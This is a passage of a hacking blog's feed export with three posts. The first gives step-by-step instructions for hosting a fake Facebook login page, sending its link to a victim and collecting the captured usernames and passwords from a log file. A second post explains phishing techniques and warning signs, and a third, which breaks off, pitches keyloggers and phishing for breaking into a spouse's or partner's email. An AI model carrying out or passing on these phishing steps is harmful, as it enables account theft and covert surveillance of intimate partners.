address&amp;nbsp;where you want the victim&amp;nbsp; to be redirected ,finally save it&lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieoFFdP65Ce6wbTB8mYjXhPn4a7rKVKk-V4fPxK__msDwpHXPK3wiOPP8n5ToCx6M50B-t5lea51L7uDm4KCDXs4BtdViaj0-GZbkeoo5r6K1zlfEEBQh8Z-o99yrhagvaECu-eJUiddU/s1600/1.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em; text-decoration: none;&quot;&gt;&lt;span style=&quot;color: red; font-family: inherit;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;165&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieoFFdP65Ce6wbTB8mYjXhPn4a7rKVKk-V4fPxK__msDwpHXPK3wiOPP8n5ToCx6M50B-t5lea51L7uDm4KCDXs4BtdViaj0-GZbkeoo5r6K1zlfEEBQh8Z-o99yrhagvaECu-eJUiddU/s320/1.png&quot; style=&quot;border-width: 0px;&quot; width=&quot;320&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span style=&quot;color: red; font-family: inherit;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;br /&gt;
&lt;blockquote&gt;
&lt;span style=&quot;color: red; font-family: inherit;&quot;&gt;Note :&amp;nbsp;This a very important step redirect the victim to a proper site other wise the&amp;nbsp; victim will get suspicious .In our case we are making fake face book login page so its&amp;nbsp; better to redirect the victim to&amp;nbsp;www.facebook.com/careers&lt;/span&gt;&lt;/blockquote&gt;
&lt;span style=&quot;color: red; font-family: inherit;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;4.&lt;/b&gt;&amp;nbsp;Now create an account at Free web hosting site like&amp;nbsp;&lt;a href=&quot;http://110mb.com/&quot; style=&quot;text-decoration: none;&quot;&gt;110mb.com&lt;/a&gt;&amp;nbsp;,&amp;nbsp;&lt;a href=&quot;http://t35.com/&quot; style=&quot;text-decoration: none;&quot;&gt;T35.com&lt;/a&gt;&amp;nbsp;or&amp;nbsp;&lt;a href=&quot;http://ripway.com/&quot; style=&quot;text-decoration: none;&quot;&gt;ripway.com&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;5.&lt;/b&gt;&amp;nbsp;Now upload both the files&amp;nbsp;(fake.html&amp;nbsp;,&amp;nbsp;login.php )&amp;nbsp;to your hosting account and&amp;nbsp;send the&amp;nbsp;fake.html(fake facbook login page) link to your victim&lt;/span&gt;&lt;br /&gt;
&lt;blockquote&gt;
&lt;span style=&quot;color: red; font-family: inherit;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;Example :-&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;www.yoursite.110 mb.com/fake.html&lt;/span&gt;&lt;/blockquote&gt;
&lt;span style=&quot;color: red; font-family: inherit;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiP644HSDyJZfw4-54_jqNAEVYQJTUHzxf862c7_BL6Ro2HRYv82O0qqP_rAkuxDbqNlh0G1_ZJNt6D7yARFIBN7cX9zJ9SQLonRwOrEGI-gxgKLK5_IeOsQ_MRDz4LrawU88gSbR74KHI/s1600/2.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em; text-decoration: none;&quot;&gt;&lt;span style=&quot;color: red; font-family: inherit;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;117&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiP644HSDyJZfw4-54_jqNAEVYQJTUHzxf862c7_BL6Ro2HRYv82O0qqP_rAkuxDbqNlh0G1_ZJNt6D7yARFIBN7cX9zJ9SQLonRwOrEGI-gxgKLK5_IeOsQ_MRDz4LrawU88gSbR74KHI/s320/2.png&quot; style=&quot;border-width: 0px;&quot; width=&quot;320&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span style=&quot;color: red; font-family: inherit;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;6.&amp;nbsp;&lt;/b&gt;Now when the victim enters all his credentials, like login&amp;nbsp;name&amp;nbsp;and password in our fake login&amp;nbsp;page and &amp;nbsp;when he clicks&amp;nbsp;login He will be redirected to site which we did in&amp;nbsp;step 3&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;7.&lt;/b&gt;&amp;nbsp;Now to see the victims&amp;nbsp;id ,password,&amp;nbsp;login to your hosting account&amp;nbsp;&quot;110mb.com&amp;nbsp;&quot; where&amp;nbsp;you will see a&amp;nbsp;new file&amp;nbsp;&quot;log.txt&quot;&amp;nbsp;.Open it to see the&amp;nbsp;victims&amp;nbsp;user id&amp;nbsp;and the&amp;nbsp;password&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
Leave a comment if you don&#39;t understand&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://toxiccloud.blogspot.com/feeds/7383863070503174000/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://toxiccloud.blogspot.com/2013/07/1.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3274283599470026861/posts/default/7383863070503174000'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3274283599470026861/posts/default/7383863070503174000'/><link rel='alternate' type='text/html' href='http://toxiccloud.blogspot.com/2013/07/1.html' title='How To Hack Facebook Using Phisher Method'/><author><name>TheKingOfEmAll</name><uri>http://www.blogger.com/profile/18003915218562093391</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='23' height='32' src='http://2.bp.blogspot.com/-p_iX0mZmqhQ/Ueki9hsAo_I/AAAAAAAAAT8/gkwKOC_Ewfo/s220/tumblr_mohaopxcFE1svd9olo1_1280.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieoFFdP65Ce6wbTB8mYjXhPn4a7rKVKk-V4fPxK__msDwpHXPK3wiOPP8n5ToCx6M50B-t5lea51L7uDm4KCDXs4BtdViaj0-GZbkeoo5r6K1zlfEEBQh8Z-o99yrhagvaECu-eJUiddU/s72-c/1.png" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3274283599470026861.post-2258954513751636032</id><published>2013-07-21T05:14:00.002-07:00</published><updated>2013-07-29T05:19:36.987-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="hacking"/><title type='text'>What is Phishing</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;div&gt;
&lt;span style=&quot;background-color: white; line-height: 19.1875px;&quot;&gt;&lt;span style=&quot;color: blue; font-family: inherit; font-size: x-large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span style=&quot;background-color: white; line-height: 19.1875px;&quot;&gt;&lt;span style=&quot;color: blue; font-family: inherit; font-size: x-large;&quot;&gt;Phishing&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; line-height: 19.1875px;&quot;&gt;&lt;span style=&quot;color: blue; font-family: inherit;&quot;&gt;Phishing is the act of attempting to acquire information such as usernames, passwords, and credit card details (and sometimes, indirectly, money) by masquerading as a trustworthy entity in an electronic communication. Communications purporting to be from popular social web sites, auction sites, online payment processors or IT administrators are commonly used to lure the unsuspecting public. Phishing emails may contain links to websites that are infected with malware. Phishing is typically carried out by email spoofing or instant messaging, and it often directs users to enter details at a fake website whose look and feel are almost identical to the legitimate one. Phishing is an example of social engineering techniques used to deceive users, and exploits the poor usability of current web security technologies. Attempts to deal with the growing number of reported phishing incidents include legislation, user training, public awareness, and technical security measures.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;color: blue;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style=&quot;background-color: white; font-family: inherit; font-size: large; line-height: 19.1875px;&quot;&gt;&lt;span style=&quot;color: blue;&quot;&gt;List of phishing techniques&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style=&quot;background-color: white; font-family: inherit; font-size: large; line-height: 19.1875px;&quot;&gt;&lt;span style=&quot;color: blue;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style=&quot;color: blue; font-family: inherit;&quot;&gt;&lt;b style=&quot;background-color: white;&quot;&gt;Phishing&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;div&gt;
&lt;span style=&quot;background-color: white; color: blue; font-family: inherit;&quot;&gt;Phishing is a way of attempting to acquire information such as usernames, passwords, and credit card details by masquerading as a trustworthy entity in an electronic communication.&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style=&quot;color: blue; font-family: inherit;&quot;&gt;&lt;b style=&quot;background-color: white;&quot;&gt;Spear phishing&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style=&quot;background-color: white; color: blue;&quot;&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;Phishing attempts directed at specific individuals or companies have been termed&amp;nbsp;&lt;/span&gt;spearphishing. Attackers&lt;span style=&quot;font-family: inherit;&quot;&gt;&amp;nbsp;may gather personal information about their target to increase their probability of success.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style=&quot;color: blue; font-family: inherit;&quot;&gt;&lt;b style=&quot;background-color: white;&quot;&gt;Clone phishing&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style=&quot;background-color: white; color: blue; font-family: inherit;&quot;&gt;A type of phishing attack whereby a legitimate, and previously delivered, email containing an attachment or link has had its content and recipient address(es) taken and used to create an almost identical or cloned email. The attachment or Link within the email is replaced with a malicious version and then sent from an email address spoofed to appear to come from the original sender. It may claim to be a resend of the original or an updated version to the original.&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style=&quot;background-color: white; color: blue; font-family: inherit;&quot;&gt;This technique could be used to pivot (indirectly) from a previously infected machine and gain a foothold on another machine, by exploiting the social trust associated with the inferred connection due to both parties receiving the original email.&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style=&quot;color: blue; font-family: inherit;&quot;&gt;&lt;b style=&quot;background-color: white;&quot;&gt;Whaling&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style=&quot;background-color: white; color: blue; font-family: inherit;&quot;&gt;Several recent phishing attacks have been directed specifically at senior executives and other high profile targets within businesses, and the term whaling has been coined for these kinds of attacks.[36]&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style=&quot;background-color: white; color: blue; font-family: inherit;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style=&quot;color: blue; font-family: inherit;&quot;&gt;&lt;b style=&quot;background-color: white;&quot;&gt;Link manipulation&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;div&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;color: blue;&quot;&gt;Most methods of phishing use some form of technical deception designed to make a link in an email appear to belong to some trusted organization or spoofed organization. Misspelled URLs or the use of subdomains are common tricks used by phishers, such as this example URL&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;color: blue;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;div&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;color: blue;&quot;&gt;www.micosoft.com&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;color: blue;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;color: blue;&quot;&gt;www.mircosoft.com&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;color: blue;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;color: blue;&quot;&gt;www.verify-microsoft.com&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;color: blue;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;color: blue;&quot;&gt;instead of www.microsoft.com&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;color: blue;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style=&quot;color: blue; font-family: inherit;&quot;&gt;&lt;b style=&quot;background-color: white;&quot;&gt;Filter evasion&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style=&quot;background-color: white; color: blue; font-family: inherit;&quot;&gt;Phishers have used images instead of text to make it harder for anti-phishing filters to detect text commonly used in phishing emails.&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style=&quot;background-color: white; color: blue; font-family: inherit;&quot;&gt;For Example:&lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;span style=&quot;background-color: white; color: blue; font-family: inherit;&quot;&gt;&lt;span style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;209&quot; src=&quot;http://2.bp.blogspot.com/-JgoOTL9jjZ4/UevOm1jzIvI/AAAAAAAAAVs/ta7w79IeWy4/s320/021604-yahoo-phishing-scam.png&quot; width=&quot;320&quot; /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style=&quot;background-color: white; color: blue; font-family: inherit;&quot;&gt;
&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style=&quot;background-color: white; color: blue; font-family: inherit;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style=&quot;background-color: white; color: blue; font-family: inherit;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style=&quot;color: blue; font-family: inherit;&quot;&gt;&lt;b style=&quot;background-color: white;&quot;&gt;Website forgery&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style=&quot;background-color: white; color: blue; font-family: inherit;&quot;&gt;Once a victim visits the phishing website, the deception is not over. Some phishing scams use JavaScript commands in order to alter the address bar.[44] This is done either by placing a picture of a legitimate URL over the address bar, or by closing the original address bar and opening a new one with the legitimate URL.&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style=&quot;background-color: white; color: blue; font-family: inherit;&quot;&gt;An attacker can even use flaws in a trusted website&#39;s own scripts against the victim.[46] These types of attacks (known as cross-site scripting) are particularly problematic, because they direct the user to sign in at their bank or service&#39;s own web page, where everything from the web address to the security certificates appears correct. In reality, the link to the website is crafted to carry out the attack, making it very difficult to spot without specialist knowledge. Just such a flaw was used in 2006 against PayPal.[47]&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style=&quot;background-color: white; color: blue; font-family: inherit;&quot;&gt;A Universal Man-in-the-middle (MITM) Phishing Kit, discovered in 2007, provides a simple-to-use interface that allows a phisher to convincingly reproduce websites and capture log-in details entered at the fake site.[48]&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style=&quot;background-color: white; color: blue; font-family: inherit;&quot;&gt;To avoid anti-phishing techniques that scan websites for phishing-related text, phishers have begun to use Flash-based websites. These look much like the real website, but hide the text in a multimedia object.[49]&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;color: blue;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;color: blue;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;color: blue;&quot;&gt;How To Identify A Fraudulent E-mail?&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;color: blue;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;color: blue;&quot;&gt;Here are a few phrases to look for if you think an e-mail message is a phishing scam.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;color: blue;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;color: blue;&quot;&gt;“Verify your account.”&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;color: blue;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;color: blue;&quot;&gt;Legitimate sites will never ask you to send passwords, login names, Social Security numbers, or any other personal information through e-mail.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;color: blue;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;color: blue;&quot;&gt;“If you don’t respond within 48 hours, your account will be closed.”&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;color: blue;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;color: blue;&quot;&gt;These messages convey a sense of urgency so that you’ll respond immediately without thinking.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;color: blue;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;color: blue;&quot;&gt;“Dear Valued Customer.”&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;color: blue;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;color: blue;&quot;&gt;Phishing e-mail messages are usually sent out in bulk andoften do not contain your first or last name.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;color: blue;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;color: blue;&quot;&gt;“Click the link below to gain access to your account.”&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;color: blue;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;color: blue;&quot;&gt;HTML-formatted messages can contain links or forms that you can fill out just as you’d fill out a form on a Web site. The links that you are urged to click may contain all or part of a real company’s name and are usually “masked,” meaning that the link you see does not take you to that address but somewhere different, usually a scam Web site.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;color: blue;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;color: blue;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;color: blue;&quot;&gt;So The Bottom Line To Defend From Phishing Attack Is&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;color: blue;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;color: blue;&quot;&gt;1. Never assume that an email is valid based on the sender’s email address.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;color: blue;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;color: blue;&quot;&gt;2. A trusted bank/organization such as paypal will never ask you for your full name and password in a PayPal&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;background-color: white; color: blue;&quot;&gt;&amp;nbsp;email.&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;color: blue;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;color: blue;&quot;&gt;3. An email from trusted organization will never contain attachments or software.&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;color: blue;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;color: blue;&quot;&gt;4. Clicking on a link in an email is the most insecure way to get to your account&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://toxiccloud.blogspot.com/feeds/2258954513751636032/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://toxiccloud.blogspot.com/2013/07/what-is-phishing.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3274283599470026861/posts/default/2258954513751636032'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3274283599470026861/posts/default/2258954513751636032'/><link rel='alternate' type='text/html' href='http://toxiccloud.blogspot.com/2013/07/what-is-phishing.html' title='What is Phishing'/><author><name>TheKingOfEmAll</name><uri>http://www.blogger.com/profile/18003915218562093391</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='23' height='32' src='http://2.bp.blogspot.com/-p_iX0mZmqhQ/Ueki9hsAo_I/AAAAAAAAAT8/gkwKOC_Ewfo/s220/tumblr_mohaopxcFE1svd9olo1_1280.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-JgoOTL9jjZ4/UevOm1jzIvI/AAAAAAAAAVs/ta7w79IeWy4/s72-c/021604-yahoo-phishing-scam.png" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3274283599470026861.post-472373077659853285</id><published>2013-07-21T04:42:00.001-07:00</published><updated>2013-07-29T05:18:07.166-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="hacking"/><title type='text'>Ways to Hack An Email</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;div align=&quot;center&quot; style=&quot;margin-bottom: 0px; margin-top: 0px;&quot;&gt;
&lt;h2 style=&quot;text-align: left;&quot;&gt;
&lt;span style=&quot;font-family: inherit; font-size: small; font-weight: normal;&quot;&gt;I know most of you might be wondering to know how to hack email? You as the reader are most likely reading this because you want to hack into someone’s email account or catch a cheating spouse, girl/boy friend by gaining access to their email accounts. So read on to find out the real and working ways to hack any email and expose the truth behind the lies.&amp;nbsp;&lt;/span&gt;&lt;/h2&gt;
&lt;h2 style=&quot;text-align: left;&quot;&gt;
&lt;span style=&quot;font-family: inherit; font-size: small;&quot;&gt;Is it Possible to Hack Email?&lt;/span&gt;&lt;/h2&gt;
&lt;h2 style=&quot;text-align: left;&quot;&gt;
&lt;span style=&quot;font-family: inherit; font-size: small; font-weight: normal;&quot;&gt;Yes! As a matter of fact, almost anything can be hacked. But before you learn the real ways to hack email, the following are the things you should be aware of.&lt;/span&gt;&lt;/h2&gt;
&lt;h2 style=&quot;text-align: left;&quot;&gt;
&lt;span style=&quot;font-family: inherit; font-size: small; font-weight: normal;&quot;&gt;1. There is no ready made software that can hack emails and get you the password just with a click of a button. So if you come accross any website that claims to sell such softwares, I would advise you not to trust them.&lt;/span&gt;&lt;/h2&gt;
&lt;h2 style=&quot;text-align: left;&quot;&gt;
&lt;span style=&quot;font-family: inherit; font-size: small; font-weight: normal;&quot;&gt;2. Never trust any email hacking service that claims to hack any email for just $100 or $200. Most of them are no more than a scam.&lt;/span&gt;&lt;/h2&gt;
&lt;h2 style=&quot;text-align: left;&quot;&gt;
&lt;span style=&quot;font-family: inherit; font-size: small; font-weight: normal;&quot;&gt;3. With my experience of over 3 years in the field of Hacking and Security, I can tell you that there exists only 2 foolproof methods for hacking email. All the other methods are simply scam or don’t work.&amp;nbsp;&lt;/span&gt;&lt;/h2&gt;
&lt;h2 style=&quot;text-align: left;&quot;&gt;
&lt;span style=&quot;font-family: inherit; font-size: small;&quot;&gt;The Following are the only Two working and Foolproof methods to hack any email.&lt;/span&gt;&lt;/h2&gt;
&lt;h2 style=&quot;text-align: left;&quot;&gt;
&lt;span style=&quot;font-family: inherit; font-size: small; font-weight: normal;&quot;&gt;1. Keylogging - Using a Keylogger&lt;/span&gt;&lt;/h2&gt;
&lt;h2 style=&quot;text-align: left;&quot;&gt;
&lt;span style=&quot;font-family: inherit; font-size: small; font-weight: normal;&quot;&gt;2. Phishing&amp;nbsp;&lt;/span&gt;&lt;/h2&gt;
&lt;h2 style=&quot;text-align: left;&quot;&gt;
&lt;span style=&quot;font-family: inherit; font-size: small;&quot;&gt;What is a Keylogger&amp;nbsp;&lt;/span&gt;&lt;/h2&gt;
&lt;h2 style=&quot;text-align: left;&quot;&gt;
&lt;span style=&quot;font-family: inherit; font-size: small; font-weight: normal;&quot;&gt;A keylogger is a hardware device or a software program that records the real time activity of a computer user including the keyboard keys they press. Keyloggers are used in mainly used IT organizations to troubleshoot technical problems with computers and business networks. Keyloggers can also be used by a family (or business) to monitor the network usage of people without their direct knowledge. Finally, malicious individuals may use keyloggers on public computers to steal passwords or credit card information.&amp;nbsp;&lt;/span&gt;&lt;/h2&gt;
&lt;h2 style=&quot;text-align: left;&quot;&gt;
&lt;span style=&quot;font-family: inherit; font-size: small;&quot;&gt;What is Phishing&amp;nbsp;&lt;/span&gt;&lt;/h2&gt;
&lt;h2 style=&quot;text-align: left;&quot;&gt;
